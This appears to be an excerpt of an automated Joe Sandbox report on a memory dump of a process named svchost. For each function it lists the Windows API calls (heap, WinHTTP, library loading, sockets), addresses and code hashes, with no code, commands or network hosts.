Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeStringtolower$_wtoi
String ID: mcco$mcco$run
API String ID: 3767767869-3413444080
Opcode ID: b6861136f8e326d3c042ad7c7da078c728545a6e6e7d1915c2030f11a707d94e
Instruction ID: 16d87dde47dbfec4f71874680f490213c2a4b8fef5ea2d831d7f44a55ef8ae21
Opcode Fuzzy Hash: b6861136f8e326d3c042ad7c7da078c728545a6e6e7d1915c2030f11a707d94e
Instruction Fuzzy Hash: 429148B6601A918AEB22DF32E4907EE37B1F749BDDF145115EF4A17A68CB36C885C700

Function 0000000140007740 Relevance: 21.1, APIs: 14, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 0000000140007762
HeapFree.KERNEL32 ref: 000000014000777D
HeapFree.KERNEL32 ref: 0000000140007798
HeapFree.KERNEL32 ref: 00000001400077B3
HeapFree.KERNEL32 ref: 00000001400077CE
HeapFree.KERNEL32 ref: 00000001400077E9
HeapFree.KERNEL32 ref: 0000000140007810
HeapFree.KERNEL32 ref: 000000014000782E
HeapFree.KERNEL32 ref: 000000014000784C
??3@YAXPEAX@Z.MSVCRT ref: 000000014000787A
WinHttpCloseHandle.WINHTTP ref: 000000014000D522
WinHttpCloseHandle.WINHTTP ref: 000000014000D531
WinHttpCloseHandle.WINHTTP ref: 000000014000D540
HeapFree.KERNEL32 ref: 000000014000D55B

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$CloseHandleHttp$??3@
String ID:
API String ID: 3500024125-0
Opcode ID: 119ff7e25ad4148979bb3aff6135a8682ecc72c0b94b38b8e4308b1bc6026636
Instruction ID: 7c82ee3f3e0be60d7d2ee0712700461a8a45a917594ce0937cf0833207fb0a1d
Opcode Fuzzy Hash: 119ff7e25ad4148979bb3aff6135a8682ecc72c0b94b38b8e4308b1bc6026636
Instruction Fuzzy Hash: F251E4B5600B8581EA86DB57E8543EA23A0FB8DFD5F04401AEF8D57776CE39C885C380

Function 00000001400030F6 Relevance: 18.4, APIs: 12, Instructions: 410COMMON

Download Yara Rule

APIs

_time64.MSVCRT ref: 0000000140003212

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: _time64
String ID:
API String ID: 1670930206-0
Opcode ID: b64c341f4c6a692dff2abba7590d2114a4e5d53f968345bcd9a99b1c3848285b
Instruction ID: 4b7130a5fe45b23e71bac91244d7ff03deac5bbb1559c1b7e8e26f4111e349c4
Opcode Fuzzy Hash: b64c341f4c6a692dff2abba7590d2114a4e5d53f968345bcd9a99b1c3848285b
Instruction Fuzzy Hash: 50126FB2600B8185FB63DF66E8503ED27A4F748BC8F444426EB4A976B6DF39CA45C740

Function 0000000140003406 Relevance: 18.4, APIs: 12, Instructions: 392memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 000000014000344A
_time64.MSVCRT ref: 0000000140003452
_wtoi.MSVCRT ref: 0000000140003493
_wtoi.MSVCRT ref: 00000001400034B8

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: _wtoi$FreeHeap_time64
String ID:
API String ID: 3473528173-0
Opcode ID: 7c303aa40e4e38331dc1585e2446f19d3a19a6b9c713990f762f01dcb679d952
Instruction ID: 3e492c6d30ee683ac932d30f26eaa9c73d21aea8094979f73a7135df6a82422b
Opcode Fuzzy Hash: 7c303aa40e4e38331dc1585e2446f19d3a19a6b9c713990f762f01dcb679d952
Instruction Fuzzy Hash: 2D026EB2600B8195FB62DF62E8503ED27A4F748BC8F444426EB4A976B9DF39C945C740

Function 00000001400031D6 Relevance: 18.4, APIs: 12, Instructions: 392COMMON

Download Yara Rule

APIs

_time64.MSVCRT ref: 0000000140003212

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: _time64
String ID:
API String ID: 1670930206-0
Opcode ID: b7efe617559e2eb79c2949e20eda16229f9fe8d4dbbeed2f454843320d0cd5ce
Instruction ID: e20eebbb1c51daf8925e8ddc921a0e42dda1ff119c888ec2a9f7eee73c6ad8fd
Opcode Fuzzy Hash: b7efe617559e2eb79c2949e20eda16229f9fe8d4dbbeed2f454843320d0cd5ce
Instruction Fuzzy Hash: C3026EB2600B8195FB62DF63E8503ED27A4F748BC8F444426EB4A976BADF39C945C740

Function 00000001400108C0 Relevance: 16.8, APIs: 11, Instructions: 308memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140011190: SysFreeString.OLEAUT32 ref: 00000001400111B8
Part of subcall function 0000000140011190: SysFreeString.OLEAUT32 ref: 00000001400111C7
Part of subcall function 0000000140011190: HeapFree.KERNEL32(?,?,?,000000014000EFEF,?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 00000001400111F7

SysFreeString.OLEAUT32 ref: 00000001400109DA
SysFreeString.OLEAUT32 ref: 00000001400109ED
SysFreeString.OLEAUT32 ref: 0000000140010D20
SysFreeString.OLEAUT32 ref: 0000000140010D2E
SysFreeString.OLEAUT32 ref: 0000000140010D63
SysFreeString.OLEAUT32 ref: 0000000140010D6D
HeapFree.KERNEL32 ref: 0000000140010D90

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$String$Heap
String ID:
API String ID: 4134718113-0
Opcode ID: 7302ecce643bb001c8937cf8e71a960d646b8d06111705271868ac4a7d8ec183
Instruction ID: 5bbe0f4e1f777998957cbe3a4eb7b9395ba18578963b24f341d411ea742c8042
Opcode Fuzzy Hash: 7302ecce643bb001c8937cf8e71a960d646b8d06111705271868ac4a7d8ec183
Instruction Fuzzy Hash: 22D15E36214A9586EB52DF26E8503EE67A0FB8DBC8F144015FF8A4BB68DF7AC545C700

Function 000000014000D7F0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 118timeCOMMON

Download Yara Rule

APIs

WinHttpCloseHandle.WINHTTP ref: 000000014000D837
WinHttpSetTimeouts.WINHTTP ref: 000000014000D85B
WinHttpOpenRequest.WINHTTP ref: 000000014000D8D4
WinHttpSetOption.WINHTTP ref: 000000014000D907
WinHttpSendRequest.WINHTTP ref: 000000014000D93D
WinHttpReceiveResponse.WINHTTP ref: 000000014000D94D
WinHttpQueryHeaders.WINHTTP ref: 000000014000D97A
WinHttpCloseHandle.WINHTTP ref: 000000014000D9A5

Strings

2), xrefs: 000000014000D84A

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Http$CloseHandleRequest$HeadersOpenOptionQueryReceiveResponseSendTimeouts
String ID: 2)
API String ID: 1140403012-1274239105
Opcode ID: ca76223a764c42e3e576a9eaca017e5749e6c79a234e6967d36dbbb6f7a1b5cb
Instruction ID: c866e5fc1bbb2455b780a7f5f5a0285e187b55cd79e2f29ec521d05873807281
Opcode Fuzzy Hash: ca76223a764c42e3e576a9eaca017e5749e6c79a234e6967d36dbbb6f7a1b5cb
Instruction Fuzzy Hash: 90516C72204B8186EB65CF26F850BAA73A0F78CB84F145116EF8987B68DB39C555CB90

Function 0000000140005460 Relevance: 15.2, APIs: 10, Instructions: 234memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 00000001400054BE
SysFreeString.OLEAUT32 ref: 00000001400054CD
??3@YAXPEAX@Z.MSVCRT ref: 00000001400054D6
??2@YAPEAX_K@Z.MSVCRT ref: 00000001400054F6
SysAllocString.OLEAUT32 ref: 000000014000550E
SysAllocString.OLEAUT32 ref: 000000014000551B
HeapFree.KERNEL32 ref: 00000001400057A9
SysFreeString.OLEAUT32 ref: 00000001400057C5
SysFreeString.OLEAUT32 ref: 00000001400057D4
??3@YAXPEAX@Z.MSVCRT ref: 00000001400057DD

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: String$Free$??3@Alloc$??2@Heap
String ID:
API String ID: 3556069409-0
Opcode ID: ec27783b2e876d2f249bbed04aa86fcb934e499a021eea16907d0ee533d21b6c
Instruction ID: c0ef10fccdeb6daa0a0422ac56e41beaac227df42e421e6682d1b4ce94b3c9bf
Opcode Fuzzy Hash: ec27783b2e876d2f249bbed04aa86fcb934e499a021eea16907d0ee533d21b6c
Instruction Fuzzy Hash: CAA17E75305A8086EA62EF12B8143EB23A5FB8DBCAF144515AF4E0B7A8EF39C541C750

Function 0000000140010DC0 Relevance: 13.7, APIs: 9, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 0000000140010E39

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

Part of subcall function 000000014000E0C0: memcpy.MSVCRT ref: 000000014000E285

SysFreeString.OLEAUT32 ref: 0000000140010E47
SysAllocString.OLEAUT32 ref: 0000000140010E59
SysAllocString.OLEAUT32 ref: 0000000140010E66
SysFreeString.OLEAUT32 ref: 0000000140011067
SysFreeString.OLEAUT32 ref: 0000000140011075
SysFreeString.OLEAUT32 ref: 00000001400110A6
SysFreeString.OLEAUT32 ref: 00000001400110B0
HeapFree.KERNEL32 ref: 00000001400110ED

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: String$Free$Alloc$Heapmemcpymemset
String ID:
API String ID: 611701654-0
Opcode ID: 43e2484f7a0373ffed07650949c510c01665978dde713542509007a1855861b5
Instruction ID: 1bf9e857b8df484256096c26ec551cdfd3ef17b886eb789306359d79b8ec2ccb
Opcode Fuzzy Hash: 43e2484f7a0373ffed07650949c510c01665978dde713542509007a1855861b5
Instruction Fuzzy Hash: C7914E32214AD186EB628F13E8503EA77A0FB8DBC8F449055FB8A4B765DF7AC546C740

Function 0000000140015CF0 Relevance: 13.7, APIs: 9, Instructions: 182memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400075C0: memset.MSVCRT ref: 000000014000761C
Part of subcall function 00000001400075C0: memset.MSVCRT ref: 0000000140007630
Part of subcall function 00000001400075C0: ??2@YAPEAX_K@Z.MSVCRT ref: 000000014000768D
Part of subcall function 00000001400075C0: _time64.MSVCRT ref: 00000001400076CF
Part of subcall function 00000001400075C0: HeapFree.KERNEL32 ref: 00000001400076F9
Part of subcall function 00000001400075C0: _time64.MSVCRT ref: 000000014000770F

HeapFree.KERNEL32 ref: 0000000140015D5C
HeapFree.KERNEL32 ref: 0000000140015DC9
HeapFree.KERNEL32 ref: 0000000140015EBF
HeapFree.KERNEL32 ref: 0000000140015EE6
HeapFree.KERNEL32 ref: 0000000140015F00
??3@YAXPEAX@Z.MSVCRT ref: 0000000140015F2A
??2@YAPEAX_K@Z.MSVCRT ref: 0000000140015F69
SysFreeString.OLEAUT32 ref: 0000000140015FD0
SysAllocString.OLEAUT32 ref: 0000000140015FD9

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$Heap$??2@String_time64memset$??3@Alloc
String ID:
API String ID: 2204789691-0
Opcode ID: 95ac986d8669442a64dbbed0be9654765a4166706f81caccdcbd7723b73e3a14
Instruction ID: d9dbd6d1c3e7fa4b14e618689f3d3978398575ef73f47ae2eb561969472c8340
Opcode Fuzzy Hash: 95ac986d8669442a64dbbed0be9654765a4166706f81caccdcbd7723b73e3a14
Instruction Fuzzy Hash: 29812872205B8586EA62EF12E8503EA63A5F7CDBC5F040029EF8D4B7A5DF3AC955C740

Function 000000014000D9E0 Relevance: 13.6, APIs: 9, Instructions: 141librarymemoryloaderCOMMON

Download Yara Rule

APIs

WinHttpQueryDataAvailable.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 000000014000DA23
RtlReAllocateHeap.NTDLL ref: 000000014000DBA1

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 000000014000DA74

Part of subcall function 000000014000E0C0: memcpy.MSVCRT ref: 000000014000E285

GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 000000014000DA96
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 000000014000DAD9
WinHttpReadData.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 000000014000DBDF

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: AddressDataHttpProc$AllocateAvailableHeapLibraryLoadQueryReadmemcpymemset
String ID:
API String ID: 2116122043-0
Opcode ID: eda387c1990850be9d72052e7b5767021a6b702d6547201d64221c1c24894c1a
Instruction ID: dcb2aa4c958721db2a120c4ea9a07c4cdbbbd9df540347d3848d8a894ea84299
Opcode Fuzzy Hash: eda387c1990850be9d72052e7b5767021a6b702d6547201d64221c1c24894c1a
Instruction Fuzzy Hash: 9D512672305B8486EA62CB17E8443DAB7A5B78CBC4F448126AF8D4B769EF7CC445C750

Function 000000014000DC30 Relevance: 12.2, APIs: 8, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000D420: WinHttpOpen.WINHTTP ref: 000000014000D49C

GetTickCount.KERNEL32 ref: 000000014000DC8A
WinHttpCloseHandle.WINHTTP ref: 000000014000DD27
WinHttpConnect.WINHTTP ref: 000000014000DD42
HeapFree.KERNEL32 ref: 000000014000DE9A
WinHttpCloseHandle.WINHTTP ref: 000000014000DF5B
WinHttpCloseHandle.WINHTTP ref: 000000014000DF6E
WinHttpCloseHandle.WINHTTP ref: 000000014000DF7E
HeapFree.KERNEL32 ref: 000000014000DF9A

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Http$CloseHandle$FreeHeap$ConnectCountOpenTickmemset
String ID:
API String ID: 2154369044-0
Opcode ID: 8013fb579bf0e103eeaccab939ae22c85777802004ef9c5a42ee6ec905e88f47
Instruction ID: 6968e017db492f2cf7c0abe04c4aaab3eddd08ff69e7388afb2cb71fd0606d81
Opcode Fuzzy Hash: 8013fb579bf0e103eeaccab939ae22c85777802004ef9c5a42ee6ec905e88f47
Instruction Fuzzy Hash: 6BA1E172211BC185EB62DF22E8503EE33A1FB99BC8F445016EB895BB69DF39C585C710

Function 0000000140005800 Relevance: 12.2, APIs: 8, Instructions: 160memorynetworkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 000000014000584E
HeapFree.KERNEL32 ref: 00000001400058B4
freeaddrinfo.WS2_32 ref: 00000001400058CF
freeaddrinfo.WS2_32 ref: 0000000140005A73
HeapFree.KERNEL32 ref: 0000000140005A8D
HeapFree.KERNEL32 ref: 0000000140005AAF
WSACleanup.WS2_32 ref: 0000000140005AB5

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

Part of subcall function 0000000140005AD0: HeapFree.KERNEL32 ref: 0000000140005BD9
Part of subcall function 0000000140005AD0: HeapFree.KERNEL32 ref: 0000000140005BF3
Part of subcall function 0000000140005AD0: HeapFree.KERNEL32 ref: 0000000140005C0F

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$freeaddrinfo$AddressCleanupLibraryLoadProcStartup
String ID:
API String ID: 4167984890-0
Opcode ID: b6c1d0173120b872468714721331bb600554943aecce16ba3b87f6cb93eadc8f
Instruction ID: 1f05485aafd538e14a92043d9081f1b9a7aae193132c0cc0b42c540dcab88815
Opcode Fuzzy Hash: b6c1d0173120b872468714721331bb600554943aecce16ba3b87f6cb93eadc8f
Instruction Fuzzy Hash: DF716A76201BC185EB62DF62E8943EA23A1FB8EBC8F444115EB8E47B65DF38C545C740

Function 000000014000D630 Relevance: 12.1, APIs: 8, Instructions: 109timeCOMMON

Download Yara Rule

APIs

WinHttpCloseHandle.WINHTTP ref: 000000014000D668
WinHttpSetTimeouts.WINHTTP ref: 000000014000D68C
WinHttpOpenRequest.WINHTTP ref: 000000014000D703
WinHttpSetOption.WINHTTP ref: 000000014000D73B
WinHttpSendRequest.WINHTTP ref: 000000014000D75E
WinHttpReceiveResponse.WINHTTP ref: 000000014000D76E
WinHttpQueryHeaders.WINHTTP ref: 000000014000D79E
WinHttpCloseHandle.WINHTTP ref: 000000014000D7C1

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Http$CloseHandleRequest$HeadersOpenOptionQueryReceiveResponseSendTimeouts
String ID:
API String ID: 1140403012-0
Opcode ID: aebf35e371f6fea2448f9b5fe53fe8f08ea4509975682a84b659a6bee2c47b2f
Instruction ID: eebc90c8ce48de3e98ba809765a9d91c4a9be35668c6a490bbbc6456ef9780f7
Opcode Fuzzy Hash: aebf35e371f6fea2448f9b5fe53fe8f08ea4509975682a84b659a6bee2c47b2f
Instruction Fuzzy Hash: C241B172208B8486EB25CF26F4507EA77A4F78CB88F54411AEB8D47768EF39C584CB50

Function 000000014000BD60 Relevance: 12.1, APIs: 8, Instructions: 92libraryloadermemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

GetModuleFileNameW.KERNEL32 ref: 000000014000BDAF
RtlReAllocateHeap.NTDLL ref: 000000014000BECA

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

LoadLibraryA.KERNEL32 ref: 000000014000BDF2

Part of subcall function 000000014000E0C0: memcpy.MSVCRT ref: 000000014000E285

GetProcAddress.KERNEL32 ref: 000000014000BE14
GetProcAddress.KERNEL32 ref: 000000014000BE43
GetProcAddress.KERNEL32 ref: 000000014000BE72
GetProcAddress.KERNEL32 ref: 000000014000BE9D
GetProcessHeap.KERNEL32 ref: 000000014000BEAF

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$HeapLibraryLoad$AllocateFileModuleNameProcessmemcpymemset
String ID:
API String ID: 2956276425-0
Opcode ID: ef3f1b3311ed1376dd4c04dcf21c248c285364accc3ced16850b60ca19486d22
Instruction ID: fe1601f0d561c1644e1890eb6a4d3931ee81d1573273c71cbb6c5fd60530c169
Opcode Fuzzy Hash: ef3f1b3311ed1376dd4c04dcf21c248c285364accc3ced16850b60ca19486d22
Instruction Fuzzy Hash: 00411471201B8585EA62DB12E8443D963A4FB8CBC4F584529EB8D07B79EF78C949C740

Function 000000014000E580 Relevance: 12.1, APIs: 8, Instructions: 71memorylibraryloaderCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL ref: 000000014000E69E

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

LoadLibraryA.KERNEL32 ref: 000000014000E5BE

Part of subcall function 000000014000E0C0: memcpy.MSVCRT ref: 000000014000E285

GetProcAddress.KERNEL32 ref: 000000014000E5E0
GetProcAddress.KERNEL32 ref: 000000014000E612
GetProcAddress.KERNEL32 ref: 000000014000E63D
GetProcAddress.KERNEL32 ref: 000000014000E668
GetProcessHeap.KERNEL32 ref: 000000014000E67E
RtlAllocateHeap.NTDLL ref: 000000014000E6A9

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$Heap$Allocate$LibraryLoadProcessmemcpymemset
String ID:
API String ID: 2235880649-0
Opcode ID: 14afeceeeb4ff7259c377ccb9d912ef373db31879d69f19dba7fcc9a066632ef
Instruction ID: a4c0c1064b289df270925e2bef4429f91acbcf3427644b2579803443337a3f80
Opcode Fuzzy Hash: 14afeceeeb4ff7259c377ccb9d912ef373db31879d69f19dba7fcc9a066632ef
Instruction Fuzzy Hash: BD3105B5205B8581EA22DB16F9403D923A5FB8CBC8F484525EB8D17B7AEF7DC549C700

Function 0000000140010480 Relevance: 10.8, APIs: 7, Instructions: 259memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140011110: SysFreeString.OLEAUT32 ref: 0000000140011138
Part of subcall function 0000000140011110: SysFreeString.OLEAUT32 ref: 0000000140011147
Part of subcall function 0000000140011110: HeapFree.KERNEL32(?,?,?,000000014000EFE0,?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 0000000140011177

SysFreeString.OLEAUT32 ref: 000000014001059A
SysFreeString.OLEAUT32 ref: 0000000140010819
SysFreeString.OLEAUT32 ref: 0000000140010853
SysFreeString.OLEAUT32 ref: 000000014001085D
HeapFree.KERNEL32 ref: 0000000140010898

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
